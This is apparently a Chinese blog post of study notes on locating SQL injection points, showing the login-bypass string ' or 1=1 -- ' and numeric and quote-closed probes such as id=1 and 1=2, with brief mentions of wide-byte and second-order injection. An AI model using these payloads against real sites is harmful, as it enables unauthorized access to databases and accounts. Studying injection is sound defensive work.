首页 > 数据库 >sql注入点判断

sql注入点判断

时间:2024-03-25 15:56:27浏览次数:26  
标签:判断 20201 数字型 Semester 报错 sql where id 注入

#1.万能注入 'or 1=1 -- '
#select * from users where username=' ' or 1=1 -- 'and password='admin4'

#一·数字型注入判断
#1.?id=1'
#select * from users where id=1';数字型则报错
#2.?id=1 and 1=1
select * from users where id= 1 and 1=1; #正常显示,若为字符型则会无显示(全被当成字符串)
#3. ?id=1 and 1=2
select * from users where id= 1 and 1=2;#不报错也无显示!!!!!


#二。字符型注入点-单引号闭合
use stu;
#1.?Semester=20201'
#select * from stu.sc where Semester='20201''; #报错
#2. ?Semester=20201' and '1'='1
select * from stu.sc where Semester='20201' and '1'='1 '; #正常显示
#3. ?Semester=20201' and '1'='2
select * from stu.sc where Semester='20201' and '1'='2 '; #无报错且无显示即NUll!!!!


#动态字符串构建
#1.宽字节注入 GBK %df \'
#2.二次注入


数字型判断 id=1/0 若报错则为数字型

标签:判断,20201,数字型,Semester,报错,sql,where,id,注入
From: https://www.cnblogs.com/betty-123/p/18094611

相关文章

  • 【附源码】JAVA计算机毕业设计银行助学贷款管理系统(springboot+mysql+开题+论文)
    本系统(程序+源码)带文档lw万字以上 文末可获取一份本项目的java源码和数据库参考。系统程序文件列表开题报告内容研究背景随着高等教育的普及和深化,越来越多的学生选择通过助学贷款来支持自己的学业。然而,传统的助学贷款管理方式往往存在效率低下、信息不透明、审批流程繁......
  • 【附源码】JAVA计算机毕业设计银行排号系统(springboot+mysql+开题+论文)
    本系统(程序+源码)带文档lw万字以上 文末可获取一份本项目的java源码和数据库参考。系统程序文件列表开题报告内容研究背景在当今信息化、数字化的时代,银行业作为金融体系的基石,其服务质量和效率直接影响到客户的满意度和忠诚度。然而,传统的银行排号系统往往存在着效率低下......
  • 【附源码】JAVA计算机毕业设计音频服务系统(springboot+mysql+开题+论文)
    本系统(程序+源码)带文档lw万字以上 文末可获取一份本项目的java源码和数据库参考。系统程序文件列表开题报告内容研究背景随着信息技术的飞速发展和人们生活水平的提高,音频服务在人们的日常生活中扮演着越来越重要的角色。从个人娱乐到商业应用,音频内容的需求日益旺盛,音频......
  • [MySQL]细节与使用经验
    【版权声明】未经博主同意,谢绝转载!(请尊重原创,博主保留追究权)https://www.cnblogs.com/cnb-yuchen/p/18032065出自【进步*于辰的博客】纯文字阐述,内容比较干。并且,由于考虑到时间长了恐有所遗漏,便即兴记录,并没有对内容进行筛选、排序。因此,大家在阅读时可以直接Ctrl+F进行......
  • MySQL中的MVCC实现机制
     MySQL中的MVCC实现机制   一、什么是MVCC?  MVCC,全称Multi-VersionConcurrencyControl,即多版本并发控制。MVCC是一种无锁的并发控制方法,一般在数据库管理系统中,用于实现对数据库的并发访问。  我们知道,在数据库中,对数据的操作主要有2中,分别是读和写,而在并发场景......
  • MySQL日常语句练习——单表DDL_DML_DQL语句练习
    前言数据库名称【schoolDB】,字符集【utf8_general_ci】。1.建表语句——DDLCREATETABLE`student`(`id`int(11)NOTNULLCOMMENT'学号',`creatDate`datetimeDEFAULTNULLCOMMENT'创建时间',`userName`varchar(20)DEFAULTNULLCOMMENT'用户名',`p......
  • MySQL日常语句联系——单表DDL-DML-DQL语句练习
    前言数据库名称可以为【jiao】,字符集【utf8】,排序规则【utf8-general_cl】。1.建表语句-DDL​CREATETABLE`xxx`(`id`int(11)DEFAULTNULLCOMMENT'学号',`creatwDate`datetimeDEFAULTNULLCOMMENT'创建时间',`userName`varchar(20)DEFAULTNULLCOMM......
  • MySQL日常语句练习——单表DDL_DML_DQL语句练习
    前言数据库名称可以为【schoolDB】,字符集【utf8】,排序规则【utf8_general_ci】。1.建表语句——DDLCREATETABLE`student`(`id`int(11)NOTNULLAUTO_INCREMENTCOMMENT'学号',`creatDate`datetimeDEFAULTNULLCOMMENT'创建时间',`userName`varchar(20)......
  • MySQL日常语句练习——单表DDL_DML_DQL语句练习
    数据可名称可以为【bei】,字符集【utf8】,排序规则【utf8_general_ci】。1、建表语句——DDLCREATETABLE`bei`( `id`int(11)NOTNULLAUTO_INCREMENTCOMMENT'学号', `creatDate`datetimeDEFAULTNULLCOMMENT'创建时间', `userName`varchar(20)DEFAULTNU......
  • SQL日常练习
    1.建表语句----DDLCREATETABLE`月光`(`id`int(11)NOTNULLAUTO_INCREMENT,`createdate`datetimeDEFAULTNULL,`username`varchar(20)DEFAULTNULL,`pwd`varchar(36)DEFAULTNULL,`phone`varchar(11)DEFAULTNULL,`age`tinyint(3)DEFAULTNU......